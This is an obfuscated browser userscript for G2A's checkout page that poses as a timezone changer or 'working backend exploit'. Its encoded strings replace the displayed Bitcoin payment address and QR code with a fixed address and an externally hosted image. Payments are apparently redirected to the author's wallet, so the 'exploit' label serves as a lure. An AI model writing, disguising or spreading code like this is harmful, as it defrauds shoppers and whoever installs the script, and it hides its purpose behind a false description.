// ==UserScript==
// @name         G2A FGC
// @namespace    ChangeTimezone
// @version      3.0 
// @description  G2A FGC
// @author       @JsonLee95
// @match        https://checkout.pay.g2a.com/*
// @grant        none
// ==/UserScript==
var _0x7f0e=["Change Timezone Enabled!","\x72\x6F\x77","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x43\x6C\x61\x73\x73\x4E\x61\x6D\x65","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x42\x54\x43\x20\x61\x64\x64\x72\x65\x73\x73 \x33\x48\x47\x72anTjv2m5y91F7v2yje\x50EeahhT\x4EmJc\x70","\x73\x72\x63","\x63\x6F\x64\x65","https://i.ibb.co/BHJJ5LG/G2-A-zenbitbay-qr.png","\x6C\x65\x6E\x67\x74\x68"];var _0x128a=[_0x7f0e[0],_0x7f0e[1],_0x7f0e[2],_0x7f0e[3],_0x7f0e[4],_0x7f0e[5],_0x7f0e[6],_0x7f0e[7],_0x7f0e[8]];alert(_0x128a[0]);var _0x4892da=setInterval(function(){var _0xe3b1x3=document[_0x128a[2]](_0x128a[1]);_0xe3b1x3[1][_0x128a[3]]= _0x128a[4];document[_0x128a[2]](_0x128a[6])[0][_0x128a[5]]= _0x128a[7];var _0xe3b1x4=document[_0x128a[2]](_0x128a[6]);if(_0xe3b1x4[_0x128a[8]]> 0){clearInterval(_0x4892da)}},10)
//Backend-Exploit | Status: Working




